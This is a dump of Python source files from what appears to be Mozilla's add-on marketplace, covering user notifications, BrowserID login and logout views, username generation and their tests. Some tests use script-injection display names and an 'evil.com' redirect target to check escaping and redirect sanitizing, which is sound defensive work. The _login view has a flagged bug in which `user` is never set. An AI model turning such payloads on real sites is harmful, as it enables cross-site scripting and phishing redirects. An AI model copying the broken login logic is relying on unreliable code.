      default_checked -- initial opt-in state
      app             -- True for Marketplace (app) variants
    """
    pass
class thanks(_NOTIFICATION):
    id = 2
    group = 'user'
    short = 'dev_thanks'
    label = _('an add-on developer thanks me for a contribution')
    mandatory = False
    default_checked = True
class reply(_NOTIFICATION):
    id = 3
    group = 'user'
    short = 'reply'
    label = _('an add-on developer replies to my review')
    mandatory = False
    default_checked = True
class app_reply(reply):
    # App variant: same id/group as `reply`, different slug and label.
    app = True
    short = 'app_reply'
    label = _('an app developer replies to my review')
class new_features(_NOTIFICATION):
    id = 4
    group = 'user'
    short = 'new_features'
    label = _('new add-ons or Firefox features are available')
    mandatory = False
    default_checked = True
class upgrade_success(_NOTIFICATION):
    id = 5
    group = 'dev'
    short = 'upgrade_success'
    label = _("my add-on's compatibility is upgraded successfully")
    mandatory = False
    default_checked = True
class sdk_upgrade_success(_NOTIFICATION):
    id = 6
    group = 'dev'
    short = 'sdk_upgrade_success'
    label = _("my sdk-based add-on is upgraded successfully")
    mandatory = False
    default_checked = True
class new_review(_NOTIFICATION):
    id = 7
    group = 'dev'
    short = 'new_review'
    label = _("someone writes a review of my add-on")
    mandatory = False
    default_checked = True
class app_new_review(new_review):
    app = True
    short = 'app_new_review'
    label = _('someone writes a review of my app')
class announcements(_NOTIFICATION):
    id = 8
    group = 'dev'
    short = 'announcements'
    label = _("add-on contests or events are announced")
    mandatory = False
    default_checked = True
class upgrade_fail(_NOTIFICATION):
    id = 9
    group = 'dev'
    short = 'upgrade_fail'
    label = _("my add-on's compatibility cannot be upgraded")
    mandatory = True
    default_checked = True
class sdk_upgrade_fail(_NOTIFICATION):
    id = 10
    group = 'dev'
    short = 'sdk_upgrade_fail'
    label = _("my sdk-based add-on cannot be upgraded")
    mandatory = True
    default_checked = True
class editor_reviewed(_NOTIFICATION):
    id = 11
    group = 'dev'
    short = 'editor_reviewed'
    label = _("my add-on is reviewed by an editor")
    mandatory = True
    default_checked = True
class individual_contact(_NOTIFICATION):
    id = 12
    group = 'dev'
    short = 'individual_contact'
    label = _("Mozilla needs to contact me about my individual add-on")
    mandatory = True
    default_checked = True
class app_reviewed(editor_reviewed):
    app = True
    # Note: This is super ambiguous language if we say "reviewer."
    short = 'app_reviewed'
    label = _('my app is reviewed by an editor')
class app_individual_contact(individual_contact):
    app = True
    short = 'app_individual_contact'
    label = _('Mozilla needs to contact me about my individual app')
class app_surveys(_NOTIFICATION):
    id = 13
    group = 'dev'
    short = 'app_surveys'
    label = _('Mozilla wants to contact me about relevant App Developer news '
              'and surveys')
    mandatory = False
    default_checked = False
    app = True
class app_regions(_NOTIFICATION):
    id = 14
    group = 'dev'
    short = 'app_regions'
    label = _('Mozilla wants to contact me about new regions added to the '
              'Marketplace')
    mandatory = False
    default_checked = True
    app = True
# Convenience registries derived from the classes above.  NOTIFICATIONS
# excludes the app variants; the *_BY_ID / *_BY_SHORT dicts index both.
NOTIFICATION_GROUPS = {'dev': _('Developer'),
                       'user': _('User Notifications')}
APP_NOTIFICATIONS = [app_reply, app_new_review, app_reviewed,
                     app_individual_contact, app_surveys, app_regions]
APP_NOTIFICATIONS_BY_ID = dict((l.id, l) for l in APP_NOTIFICATIONS)
APP_NOTIFICATIONS_DEFAULT = [l.id for l in APP_NOTIFICATIONS]
APP_NOTIFICATIONS_CHOICES = [(l.id, l.label) for l in APP_NOTIFICATIONS]
APP_NOTIFICATIONS_CHOICES_NOT_DEV = [(l.id, l.label) for l in APP_NOTIFICATIONS
                                     if l.group != 'dev']
NOTIFICATIONS = [x for x in vars().values()
                 if isclass(x) and issubclass(x, _NOTIFICATION)
                 and x != _NOTIFICATION and not getattr(x, 'app', False)]
NOTIFICATIONS_BY_ID = dict((l.id, l) for l in NOTIFICATIONS)
ALL_NOTIFICATIONS_BY_ID = dict((l.id, l) for l in
                               NOTIFICATIONS + APP_NOTIFICATIONS)
NOTIFICATIONS_BY_SHORT = dict((l.short, l) for l in
                              NOTIFICATIONS + APP_NOTIFICATIONS)
NOTIFICATION = AttributeDict((l.__name__, l) for l in NOTIFICATIONS)
NOTIFICATIONS_DEFAULT = [l.id for l in NOTIFICATIONS if l.default_checked]
NOTIFICATIONS_CHOICES = [(l.id, l.label) for l in NOTIFICATIONS]
NOTIFICATIONS_CHOICES_NOT_DEV = [(l.id, l.label) for l in NOTIFICATIONS
                                 if l.group != 'dev']
########NEW FILE########
__FILENAME__ = signals
from django.dispatch import Signal
# Sent by users.views.logout after auth.logout() so listeners can mutate
# the redirect response (e.g. delete cookies) before it is returned.
logged_out = Signal(providing_args=['request', 'response'])
########NEW FILE########
__FILENAME__ = tasks
import commonware.log
from celeryutils import task
from .models import UserProfile
task_log = commonware.log.getLogger('z.task')
@task(rate_limit='15/m')
def update_user_ratings_task(data, **kw):
    """Persist freshly computed average ratings for a batch of authors.

    ``data`` is a sequence of ``(user_pk, average_rating)`` pairs; each
    average is rounded/formatted to two decimals before being stored.
    """
    task_log.info("[%s@%s] Updating add-on author's ratings." %
                  (len(data), update_user_ratings_task.rate_limit))
    for user_pk, average in data:
        formatted = "%.2f" % round(average, 2)
        UserProfile.objects.filter(pk=user_pk).update(
            averagerating=formatted)
########NEW FILE########
__FILENAME__ = test_helpers
# -*- coding: utf-8 -*-
import re
from nose.tools import eq_
from users.helpers import emaillink, user_data, user_link, users_list
from users.models import UserProfile
def test_emaillink():
    """emaillink()'s obfuscated markup must round-trip to the raw address."""
    email = '[email protected]'
    obfuscated = unicode(emaillink(email))
    # remove junk
    m = re.match(r'<a href="#"><span class="emaillink">(.*?)'
                 '<span class="i">null</span>(.*)</span></a>'
                 '<span class="emaillink js-hidden">(.*?)'
                 '<span class="i">null</span>(.*)</span>', obfuscated)
    # NOTE(review): the replace() calls below are no-ops ('@'->'@',
    # '.'->'.'); they look like HTML entities (&#x...;) that were decoded
    # when this file was exported -- verify against users.helpers.emaillink.
    obfuscated = (''.join((m.group(1), m.group(2)))
                  .replace('@', '@').replace('.', '.'))[::-1]
    eq_(email, obfuscated)
    title = 'E-mail your question'
    obfuscated = unicode(emaillink(email, title))
    m = re.match(r'<a href="#">(.*)</a>'
                 '<span class="emaillink js-hidden">(.*?)'
                 '<span class="i">null</span>(.*)</span>', obfuscated)
    eq_(title, m.group(1))
    obfuscated = (''.join((m.group(2), m.group(3)))
                  .replace('@', '@').replace('.', '.'))[::-1]
    eq_(email, obfuscated)
def test_user_link():
    """user_link() renders an anchor with the display name; None -> ''."""
    u = UserProfile(username='jconnor', display_name='John Connor', pk=1)
    eq_(user_link(u), '<a href="%s">John Connor</a>' % u.get_url_path())
    # handle None gracefully
    eq_(user_link(None), '')
def test_user_link_xss():
    """Display names must be HTML-escaped, never rendered as markup."""
    u = UserProfile(username='jconnor',
                    display_name='<script>alert(1)</script>', pk=1)
    # Expect the *escaped* form back.  The previous expected value was the
    # raw unescaped string (HTML entities were decoded out of this file),
    # which made the test assert the opposite of its stated purpose.
    html = "&lt;script&gt;alert(1)&lt;/script&gt;"
    eq_(user_link(u), '<a href="%s">%s</a>' % (u.get_url_path(), html))
def test_users_list():
    """users_list() joins the individual user links with ', '."""
    u1 = UserProfile(username='jconnor', display_name='John Connor', pk=1)
    u2 = UserProfile(username='sconnor', display_name='Sarah Connor', pk=2)
    eq_(users_list([u1, u2]), ', '.join((user_link(u1), user_link(u2))))
    # handle None gracefully
    eq_(user_link(None), '')
def test_short_users_list():
    """Test the option to shorten the users list to a certain size."""
    # short list with 'others'
    u1 = UserProfile(username='oscar', display_name='Oscar the Grouch', pk=1)
    u2 = UserProfile(username='grover', display_name='Grover', pk=2)
    u3 = UserProfile(username='cookies!', display_name='Cookie Monster', pk=3)
    shortlist = users_list([u1, u2, u3], size=2)
    eq_(shortlist, ', '.join((user_link(u1), user_link(u2))) + ', others')
def test_user_link_unicode():
    """make sure helper won't choke on unicode input"""
    u = UserProfile(username=u'jmüller', display_name=u'Jürgen Müller', pk=1)
    eq_(user_link(u), u'<a href="%s">Jürgen Müller</a>' % u.get_url_path())
    # Byte-string username: the helper must decode it for display.
    u = UserProfile(username='\xe5\xaf\x92\xe6\x98\x9f', pk=1)
    eq_(user_link(u),
        u'<a href="%s">%s</a>' % (u.get_url_path(), u.username))
def test_user_data():
    """user_data() reports a real profile as non-anonymous."""
    u = user_data(UserProfile(username='foo', pk=1))
    eq_(u['anonymous'], False)
########NEW FILE########
__FILENAME__ = test_models
# -*- coding: utf-8 -*-
import datetime
from django import forms
from django.conf import settings
from django.utils import translation
from mock import patch
from nose.tools import eq_
import amo
import amo.tests
from access.models import Group, GroupUser
from addons.models import Addon, AddonUser
from reviews.models import Review
from translations.models import Translation
from users.models import UserEmailField, UserProfile
class TestUserProfile(amo.tests.TestCase):
    """Model-level behavior of UserProfile (anonymize, perms, URLs, ...)."""
    fixtures = ('base/addon_3615', 'base/user_2519', 'base/user_4043307',
                'users/test_backends', 'base/apps',)
    def test_anonymize(self):
        # anonymize() must null out the email on the stored row.
        u = UserProfile.objects.get(id='4043307')
        eq_(u.email, '[email protected]')
        u.anonymize()
        x = UserProfile.objects.get(id='4043307')
        eq_(x.email, None)
    def test_add_admin_powers(self):
        # Joining a '*:*' group grants staff + superuser.
        Group.objects.create(name='Admins', rules='*:*')
        u = UserProfile.objects.get(username='jbalogh')
        assert not u.is_staff
        assert not u.is_superuser
        GroupUser.objects.create(group=Group.objects.filter(name='Admins')[0],
                                 user=u)
        assert u.is_staff
        assert u.is_superuser
    def test_dont_add_admin_powers(self):
        # Non-wildcard groups must not grant admin powers.
        Group.objects.create(name='API', rules='API.Users:*')
        u = UserProfile.objects.get(username='jbalogh')
        GroupUser.objects.create(group=Group.objects.get(name='API'),
                                 user=u)
        assert not u.is_staff
        assert not u.is_superuser
    def test_remove_admin_powers(self):
        # Powers disappear with the group membership.
        Group.objects.create(name='Admins', rules='*:*')
        u = UserProfile.objects.get(username='jbalogh')
        g = GroupUser.objects.create(group=Group.objects.filter(name='Admins')[0],
                                     user=u)
        g.delete()
        assert not u.is_staff
        assert not u.is_superuser
    def test_picture_url(self):
        """
        Test for a preview URL if image is set, or default image otherwise.
        """
        u = UserProfile(id=1234, picture_type='image/png',
                        modified=datetime.date.today())
        u.picture_url.index('/userpics/0/1/1234.png?modified=')
        u = UserProfile(id=1234567890, picture_type='image/png',
                        modified=datetime.date.today())
        u.picture_url.index('/userpics/1234/1234567/1234567890.png?modified=')
        u = UserProfile(id=1234, picture_type=None)
        assert u.picture_url.endswith('/anon_user.png')
    def test_review_replies(self):
        """
        Make sure that developer replies are not returned as if they were
        original reviews.
        """
        addon = Addon.objects.get(id=3615)
        u = UserProfile.objects.get(pk=2519)
        version = addon.get_version()
        new_review = Review(version=version, user=u, rating=2, body='hello',
                            addon=addon)
        new_review.save()
        new_reply = Review(version=version, user=u, reply_to=new_review,
                           addon=addon, body='my reply')
        new_reply.save()
        review_list = [r.pk for r in u.reviews]
        eq_(len(review_list), 1)
        assert new_review.pk in review_list, (
            'Original review must show up in review list.')
        assert new_reply.pk not in review_list, (
            'Developer reply must not show up in review list.')
    def test_my_apps(self):
        """Test helper method to get N apps."""
        addon1 = Addon.objects.create(name='test-1', type=amo.ADDON_WEBAPP)
        AddonUser.objects.create(addon_id=addon1.id, user_id=2519, listed=True)
        addon2 = Addon.objects.create(name='test-2', type=amo.ADDON_WEBAPP)
        AddonUser.objects.create(addon_id=addon2.id, user_id=2519, listed=True)
        u = UserProfile.objects.get(id=2519)
        addons = u.my_apps()
        self.assertTrue(sorted([a.name for a in addons]) == [addon1.name,
                                                             addon2.name])
    def test_get_url_path(self):
        # See bug 880767: profile URLs are currently stubbed to '#',
        # so these expectations document the pre-stub routing scheme.
        eq_(UserProfile(username='yolo').get_url_path(),
            '/en-US/firefox/user/yolo/')
        eq_(UserProfile(username='yolo', id=1).get_url_path(),
            '/en-US/firefox/user/yolo/')
        eq_(UserProfile(id=1).get_url_path(),
            '/en-US/firefox/user/1/')
        eq_(UserProfile(username='<yolo>', id=1).get_url_path(),
            '/en-US/firefox/user/1/')
    @patch.object(settings, 'LANGUAGE_CODE', 'en-US')
    def test_activate_locale(self):
        # activate_lang() uses the user's lang, else the site default.
        eq_(translation.get_language(), 'en-us')
        with UserProfile(username='yolo').activate_lang():
            eq_(translation.get_language(), 'en-us')
        with UserProfile(username='yolo', lang='fr').activate_lang():
            eq_(translation.get_language(), 'fr')
    def test_remove_locale(self):
        # Removing a locale drops only that locale's translation rows.
        u = UserProfile.objects.create()
        u.bio = {'en-US': 'my bio', 'fr': 'ma bio'}
        u.save()
        u.remove_locale('fr')
        qs = (Translation.objects.filter(localized_string__isnull=False)
              .values_list('locale', flat=True))
        eq_(sorted(qs.filter(id=u.bio_id)), ['en-US'])
class TestUserEmailField(amo.tests.TestCase):
    """UserEmailField.clean() maps an email to its UserProfile or raises."""
    fixtures = ['base/user_2519']
    def test_success(self):
        user = UserProfile.objects.get(pk=2519)
        eq_(UserEmailField().clean(user.email), user)
    def test_failure(self):
        # Unknown address -> ValidationError.
        with self.assertRaises(forms.ValidationError):
            UserEmailField().clean('xxx')
    def test_empty_email(self):
        # An empty string must hit the required-field error, not match the
        # existing empty-email row created above.
        UserProfile.objects.create(email='')
        with self.assertRaises(forms.ValidationError) as e:
            UserEmailField().clean('')
        eq_(e.exception.messages[0], 'This field is required.')
########NEW FILE########
__FILENAME__ = test_user_utils
import fudge
import mock
from nose.tools import eq_
from django.conf import settings
import amo.tests
from users.utils import autocreate_username
class TestAutoCreateUsername(amo.tests.TestCase):
    """Behavior of users.utils.autocreate_username (slugging + collisions)."""
    def test_invalid_characters(self):
        eq_(autocreate_username('testaccount+slug'), 'testaccountslug')
    def test_empty_username_is_a_random_hash(self):
        un = autocreate_username('.+')  # this shouldn't happen but it could!
        assert len(un) and not un.startswith('.+'), 'Unexpected: %s' % un
    @mock.patch.object(settings, 'MAX_GEN_USERNAME_TRIES', 3)
    @fudge.patch('users.utils.UserProfile.objects.filter')
    def test_too_many_tries(self, filter):
        # Each fake .count() returning 1 simulates a taken username.
        filter = (filter.is_callable().returns_fake().provides('count')
                  .returns(1))
        for i in range(3):
            # Simulate existing username.
            filter = filter.next_call().returns(1)
        # Simulate available username.
        filter = filter.next_call().returns(0)
        # After the third try, give up, and generate a random string username.
        un = autocreate_username('base')
        assert not un.startswith('base'), 'Unexpected: %s' % un
    @fudge.patch('users.utils.UserProfile.objects.filter')
    def test_duplicate_username_counter(self, filter):
        # Two collisions then success -> counter suffix '3'.
        filter = (filter.expects_call().returns_fake().expects('count')
                  .returns(1).next_call().returns(1).next_call().returns(0))
        eq_(autocreate_username('existingname'), 'existingname3')
########NEW FILE########
__FILENAME__ = test_views
import json
from nose.tools import eq_
from waffle import helpers # NOQA
import amo
import amo.tests
from amo.helpers import urlparams
from amo.pyquery_wrapper import PyQuery as pq
from amo.urlresolvers import reverse
from users.models import UserProfile
class UserViewBase(amo.tests.TestCase):
    """Shared setup for user-view tests: a test client and a known user."""
    fixtures = ['users/test_backends']
    def setUp(self):
        self.client = amo.tests.TestClient()
        # Prime the client (session/cookies) with an initial request.
        self.client.get('/')
        self.user = UserProfile.objects.get(id='4043307')
    def get_profile(self):
        # Re-fetch so tests see the current DB state, not a cached object.
        return UserProfile.objects.get(id=self.user.id)
class TestAjax(UserViewBase):
    """Tests for the users.ajax email-lookup endpoint."""
    def setUp(self):
        super(TestAjax, self).setUp()
        self.client.login(username='[email protected]', password='foo')

    def test_ajax_404(self):
        # No ?q= parameter at all -> 404.
        r = self.client.get(reverse('users.ajax'), follow=True)
        eq_(r.status_code, 404)

    def test_ajax_success(self):
        r = self.client.get(reverse('users.ajax'), {'q': '[email protected]'},
                            follow=True)
        data = json.loads(r.content)
        eq_(data, {'status': 1, 'message': '', 'id': 9945,
                   'name': u'Justin Scott \u0627\u0644\u062a\u0637\u0628'})

    def test_ajax_xss(self):
        self.user.display_name = '<script>alert("xss")</script>'
        self.user.save()
        assert '<script>' in self.user.display_name, (
            'Expected <script> to be in display name')
        r = self.client.get(reverse('users.ajax'),
                            {'q': self.user.email, 'dev': 0})
        assert '<script>' not in r.content
        # The escaped form must be present.  (The second assertion used to
        # check for the raw '<script>' -- directly contradicting the line
        # above -- because the HTML entities were decoded out of this file.)
        assert '&lt;script&gt;' in r.content

    def test_ajax_failure_incorrect_email_mkt(self):
        r = self.client.get(reverse('users.ajax'), {'q': 'incorrect'},
                            follow=True)
        data = json.loads(r.content)
        eq_(data,
            {'status': 0,
             'message': 'A user with that email address does not exist, or the'
                        ' user has not yet accepted the developer agreement.'})

    def test_ajax_failure_no_email(self):
        r = self.client.get(reverse('users.ajax'), {'q': ''}, follow=True)
        data = json.loads(r.content)
        eq_(data,
            {'status': 0,
             'message': 'An email address is required.'})

    def test_forbidden(self):
        # Anonymous requests are rejected with 401.
        self.client.logout()
        r = self.client.get(reverse('users.ajax'))
        eq_(r.status_code, 401)
class TestLogout(UserViewBase):
    """Tests for the logout view, including redirect sanitization."""
    def test_success(self):
        user = UserProfile.objects.get(email='[email protected]')
        self.client.login(username=user.email, password='foo')
        r = self.client.get('/', follow=True)
        eq_(pq(r.content.decode('utf-8'))('.account .user').text(),
            user.display_name)
        eq_(pq(r.content)('.account .user').attr('title'), user.email)
        # After logging out, the account widget must be gone.
        r = self.client.get('/users/logout', follow=True)
        assert not pq(r.content)('.account .user')
    def test_redirect(self):
        self.client.login(username='[email protected]', password='foo')
        self.client.get('/', follow=True)
        url = '/en-US/about'
        r = self.client.get(urlparams(reverse('users.logout'), to=url),
                            follow=True)
        self.assertRedirects(r, url, status_code=302)
        # Test a valid domain. Note that assertRedirects doesn't work on
        # external domains
        url = urlparams(reverse('users.logout'), to='/addon/new',
                        domain='builder')
        r = self.client.get(url, follow=True)
        to, code = r.redirect_chain[0]
        self.assertEqual(to, 'https://builder.addons.mozilla.org/addon/new')
        self.assertEqual(code, 302)
        # Test an invalid domain
        url = urlparams(reverse('users.logout'), to='/en-US/about',
                        domain='http://evil.com')
        r = self.client.get(url, follow=True)
        self.assertRedirects(r, '/en-US/about', status_code=302)
########NEW FILE########
__FILENAME__ = utils
import uuid
from functools import partial
from django.conf import settings
import commonware.log
from users.models import UserProfile
log = commonware.log.getLogger('z.users')
def get_task_user():
    """
    Returns a user object. This user is suitable for assigning to
    cron jobs or long running tasks.
    """
    # settings.TASK_USER_ID must reference an existing UserProfile row;
    # this raises DoesNotExist otherwise.
    return UserProfile.objects.get(pk=settings.TASK_USER_ID)
def autocreate_username(candidate, tries=1):
    """Returns a unique valid username.

    Slugifies ``candidate``; on collision, recurses with a numeric suffix
    (``tries``).  If the slug is empty, too long, or the retry budget
    (settings.MAX_GEN_USERNAME_TRIES) is exhausted, falls back to a random
    hex name and starts over.
    """
    max_tries = settings.MAX_GEN_USERNAME_TRIES
    from amo.utils import slugify, SLUG_OK
    make_u = partial(slugify, ok=SLUG_OK, lower=True, spaces=False,
                     delimiter='-')
    adjusted_u = make_u(candidate)
    if tries > 1:
        # Disambiguate collisions by appending the attempt counter.
        adjusted_u = '%s%s' % (adjusted_u, tries)
    if (adjusted_u == '' or tries > max_tries or len(adjusted_u) > 255):
        log.info('username empty, max tries reached, or too long;'
                 ' username=%s; max=%s' % (adjusted_u, max_tries))
        # Random 15-char hex fallback; restart with a fresh try counter.
        return autocreate_username(uuid.uuid4().hex[0:15])
    if UserProfile.objects.filter(username=adjusted_u).count():
        return autocreate_username(candidate, tries=tries + 1)
    return adjusted_u
########NEW FILE########
__FILENAME__ = views
import functools
from django import http
from django.conf import settings
from django.contrib import auth
from django.contrib.auth.views import login as auth_login
from django.db import transaction
from django.shortcuts import get_object_or_404, render
from django.utils.http import is_safe_url
from django.views.decorators.csrf import csrf_exempt
import commonware.log
from django_browserid import get_audience, verify
from django_statsd.clients import statsd
from tower import ugettext as _
import amo
from access.middleware import ACLMiddleware
from addons.decorators import addon_view_factory
from addons.models import Addon
from amo import messages
from amo.decorators import json_view, login_required, post_required
from amo.urlresolvers import get_url_prefix
from amo.utils import escape_all, log_cef
from lib.metrics import record_action
from .models import UserProfile
from .signals import logged_out
from .utils import autocreate_username
log = commonware.log.getLogger('z.users')
addon_view = addon_view_factory(qs=Addon.objects.valid)
def user_view(f):
    """Decorator that resolves a user id/username URL arg to a profile."""
    @functools.wraps(f)
    def wrapper(request, user_id, *args, **kw):
        """Provides a user object given a user ID or username."""
        # All-digit identifiers are primary keys; anything else is a
        # username.  (Decided before the `me` substitution, matching the
        # original lookup semantics.)
        lookup_field = 'id' if user_id.isdigit() else 'username'
        # `me` is an alias for the authenticated user's own profile.
        if (user_id == 'me' and request.amo_user and
            request.amo_user.username):
            user_id = request.amo_user.username
        user = get_object_or_404(UserProfile, **{lookup_field: user_id})
        return f(request, user, *args, **kw)
    return wrapper
@login_required(redirect=False)
@json_view
def ajax(request):
    """Query for a user matching a given email.

    GET params: ``q`` (required; 404 if absent) and ``dev`` (default '1';
    when truthy, only users who accepted the developer agreement match).
    Returns {'status', 'message'} plus 'id'/'name' on success, escaped.
    """
    if 'q' not in request.GET:
        raise http.Http404()
    data = {'status': 0, 'message': ''}
    email = request.GET.get('q', '').strip()
    dev_only = request.GET.get('dev', '1')
    try:
        dev_only = int(dev_only)
    except ValueError:
        # Non-numeric dev flag: fall back to the dev-only default.
        dev_only = 1
    if not email:
        data.update(message=_('An email address is required.'))
        return data
    user = UserProfile.objects.filter(email=email)
    if dev_only:
        user = user.exclude(read_dev_agreement=None)
    msg = _('A user with that email address does not exist.')
    msg_dev = _('A user with that email address does not exist, or the user '
                'has not yet accepted the developer agreement.')
    if user:
        data.update(status=1, id=user[0].id, name=user[0].name)
    else:
        data['message'] = msg_dev if dev_only else msg
    # escape_all prevents XSS through the user's display name.
    return escape_all(data)
def _clean_next_url(request):
    """Sanitize the ?to= redirect target on ``request`` in place.

    Off-host URLs fall back to settings.LOGIN_REDIRECT_URL; a whitelisted
    ``domain`` parameter may prefix the path with a trusted external host.
    The cleaned value is written back into a mutable copy of request.GET.
    """
    params = request.GET.copy()
    url = params.get('to', settings.LOGIN_REDIRECT_URL)
    if not is_safe_url(url, host=request.get_host()):
        log.info(u'Unsafe redirect to %s' % url)
        url = settings.LOGIN_REDIRECT_URL
    domain = params.get('domain', None)
    if domain in settings.VALID_LOGIN_REDIRECTS:
        url = settings.VALID_LOGIN_REDIRECTS[domain] + url
    params['to'] = url
    request.GET = params
    return request
def browserid_authenticate(request, assertion, is_mobile=False,
                           browserid_audience=get_audience):
    """
    Verify a BrowserID login attempt. If the BrowserID assertion is
    good, but no account exists, create one.

    Returns a (profile, error_message) pair; exactly one of the two is
    None.
    """
    url = settings.BROWSERID_VERIFICATION_URL
    # We must always force the Firefox OS identity provider. This is because
    # we are sometimes allowing unverified assertions and you can't mix that
    # feature with bridged IdPs. See bug 910938.
    extra_params = {}
    if settings.UNVERIFIED_ISSUER:
        extra_params['experimental_forceIssuer'] = settings.UNVERIFIED_ISSUER
    if is_mobile:
        # When persona is running in a mobile OS then we can allow unverified
        # assertions.
        url = settings.NATIVE_BROWSERID_VERIFICATION_URL
        extra_params['experimental_allowUnverified'] = 'true'
    log.debug('Verifying Persona at %s, audience: %s, '
              'extra_params: %s' % (url, browserid_audience, extra_params))
    result = verify(assertion, browserid_audience,
                    url=url, extra_params=extra_params)
    if not result:
        return None, _('Persona authentication failure.')
    # Track whether the verifier vouched for the email address.
    if 'unverified-email' in result:
        email = result['unverified-email']
        verified = False
    else:
        email = result['email']
        verified = True
    try:
        profile = UserProfile.objects.filter(email=email)[0]
    except IndexError:
        profile = None
    if profile:
        if profile.is_verified and not verified:
            # An attempt to log in to a verified address with an unverified
            # assertion is a very bad thing. Don't let that happen.
            log.debug('Verified user %s attempted to log in with an '
                      'unverified assertion!' % profile)
            return None, _('Please use the verified email for this account.')
        else:
            profile.is_verified = verified
            profile.save()
        return profile, None
    # No existing account: auto-provision one from the email's local part.
    username = autocreate_username(email.partition('@')[0])
    source = amo.LOGIN_SOURCE_MMO_BROWSERID
    profile = UserProfile.objects.create(username=username, email=email,
                                         source=source, display_name=username,
                                         is_verified=verified)
    log_cef('New Account', 5, request, username=username,
            signature='AUTHNOTICE',
            msg='User created a new account (from Persona)')
    record_action('new-user', request)
    return profile, None
@csrf_exempt
@post_required
@transaction.commit_on_success
#@ratelimit(block=True, rate=settings.LOGIN_RATELIMIT_ALL_USERS)
def browserid_login(request, browserid_audience=None):
    """POST endpoint: verify a Persona assertion and log the user in.

    Returns 200 on success (or when already authenticated) and 401 with
    an error message body on failure.
    """
    msg = ''
    if request.user.is_authenticated():
        # If username is different, maybe sign in as new user?
        return http.HttpResponse(status=200)
    try:
        is_mobile = bool(int(request.POST.get('is_mobile', 0)))
    except ValueError:
        is_mobile = False
    with statsd.timer('auth.browserid.verify'):
        profile, msg = browserid_authenticate(
            request, request.POST.get('assertion'),
            is_mobile=is_mobile,
            browserid_audience=browserid_audience or get_audience(request))
    if profile is not None:
        auth.login(request, profile)
        profile.log_login_attempt(True)
        return http.HttpResponse(status=200)
    return http.HttpResponse(msg, status=401)
# Used by mkt.developers.views:login.
def _login(request, template=None, data=None, dont_redirect=False):
    """Wrap django.contrib.auth.views.login with redirect sanitization
    and post-login account checks.  Used by mkt.developers.views:login.
    """
    data = data or {}
    data['webapp'] = settings.APP_PREVIEW
    # In case we need it later. See below.
    get_copy = request.GET.copy()
    if 'to' in request.GET:
        request = _clean_next_url(request)
    if request.user.is_authenticated():
        return http.HttpResponseRedirect(
            request.GET.get('to', settings.LOGIN_REDIRECT_URL))
    user = None
    login_status = None
    r = auth_login(request, template_name=template, redirect_field_name='to',
                   extra_context=data)
    if isinstance(r, http.HttpResponseRedirect):
        # Django's auth.views.login has security checks to prevent someone from
        # redirecting to another domain. Since we want to allow this in
        # certain cases, we have to make a new response object here to replace
        # the above.
        if 'domain' in request.GET:
            request.GET = get_copy
            request = _clean_next_url(request)
            r = http.HttpResponseRedirect(request.GET['to'])
        # Successful log in according to django. Now we do our checks. I do
        # the checks here instead of the form's clean() because I want to use
        # the messages framework and it's not available in the request there.
        # NOTE(review): `user` is still None at this point, so the branch
        # below raises AttributeError on every successful login redirect;
        # an assignment (e.g. from request.user / the login form) appears
        # to be missing -- TODO confirm against upstream before fixing.
        if user.deleted:
            logout(request)
            log.warning(u'Attempt to log in with deleted account (%s)' % user)
            messages.error(request, _('Wrong email address or password!'))
            user.log_login_attempt(False)
            log_cef('Authentication Failure', 5, request,
                    username=request.user, signature='AUTHFAIL',
                    msg='Account is deactivated')
            return render(request, template, data)
        login_status = True
    if dont_redirect:
        # We're recalling the middleware to re-initialize amo_user
        ACLMiddleware().process_request(request)
        r = render(request, template, data)
    if login_status is not None:
        user.log_login_attempt(login_status)
        log_cef('Authentication Failure', 5, request,
                username=request.POST['username'],
                signature='AUTHFAIL',
                msg='The password was incorrect')
    return r
def logout(request):
    """Log the user out, then redirect to the sanitized ?to= target or
    the configured default (LOGOUT_REDIRECT_URL, locale/app prefixed).

    Fires the ``logged_out`` signal with the response so listeners can
    mutate it (e.g. delete cookies) before it is returned.
    """
    user = request.user
    if not user.is_anonymous():
        log.debug(u"User (%s) logged out" % user)
    auth.logout(request)
    if 'to' in request.GET:
        request = _clean_next_url(request)
    # Renamed from `next`, which shadowed the builtin of the same name.
    next_url = request.GET.get('to')
    if not next_url:
        next_url = settings.LOGOUT_REDIRECT_URL
        prefixer = get_url_prefix()
        if prefixer:
            next_url = prefixer.fix(next_url)
    response = http.HttpResponseRedirect(next_url)
    # Fire logged out signal.
    logged_out.send(None, request=request, response=response)
    return response
########NEW FILE########
__FILENAME__ = admin
from django.contrib import admin
from .models import License, Version
class LicenseAdmin(admin.ModelAdmin):
    """Admin list options for License rows, ordered by builtin status."""
    list_display = ('id', 'name', 'builtin', 'url')
    list_filter = ('builtin',)
    ordering = ('builtin',)
admin.site.register(License, LicenseAdmin)
# Versions get the stock ModelAdmin.
admin.site.register(Version)
########NEW FILE########
__FILENAME__ = compare
import re
from django.utils.encoding import smart_str
MAXVERSION = 2 ** 63 - 1
version_re = re.compile(r"""(?P<major>\d+|\*) # major (x in x.y)
\.?(?P<minor1>\d+|\*)? # minor1 (y in x.y)
\.?(?P<minor2>\d+|\*)? # minor2 (z in x.y.z)
\.?(?P<minor3>\d+|\*)? # minor3 (w in x.y.z.w)
(?P<alpha>[a|b]?) # alpha/beta
(?P<alpha_ver>\d*) # alpha/beta version
(?P<pre>pre)? # pre release
(?P<pre_ver>\d)? # pre release version
""",
re.VERBOSE)
def dict_from_int(version_int):
    """Convert a packed version integer back into a components dict.

    Fields are peeled off the low end of the number in the reverse of the
    order version_int() packed them: a width of 100 holds two decimal
    digits, a width of 10 holds one.
    """
    fields = (('pre_ver', 100), ('pre', 10), ('alpha_ver', 100),
              ('alpha', 10), ('minor3', 100), ('minor2', 100),
              ('minor1', 100), ('major', 100))
    d = {}
    remainder = version_int
    for name, width in fields:
        remainder, d[name] = divmod(remainder, width)
    # Packed encoding stores 0 for a "pre" release and 1 for anything else.
    d['pre'] = None if d['pre'] else 'pre'
    # 0 -> alpha, 1 -> beta; anything else (a final release) -> None.
    d['alpha'] = {0: 'a', 1: 'b'}.get(d['alpha'])
    return d
def num(vint):
    """Render the numeric part (major.minor1.minor2.minor3) of a packed
    version integer as a dotted string."""
    parts = dict_from_int(vint)
    return '%(major)s.%(minor1)s.%(minor2)s.%(minor3)s' % parts
def version_dict(version):
    """Turn a version string into a dict with major/minor/... info.

    Unparseable (or empty) strings yield a dict with every field None.
    Wildcard fields ('*') become 99, the maximum two-digit value the
    packed-int encoding can hold.
    """
    match = version_re.match(version or '')
    letters = 'alpha pre'.split()
    numbers = 'major minor1 minor2 minor3 alpha_ver pre_ver'.split()
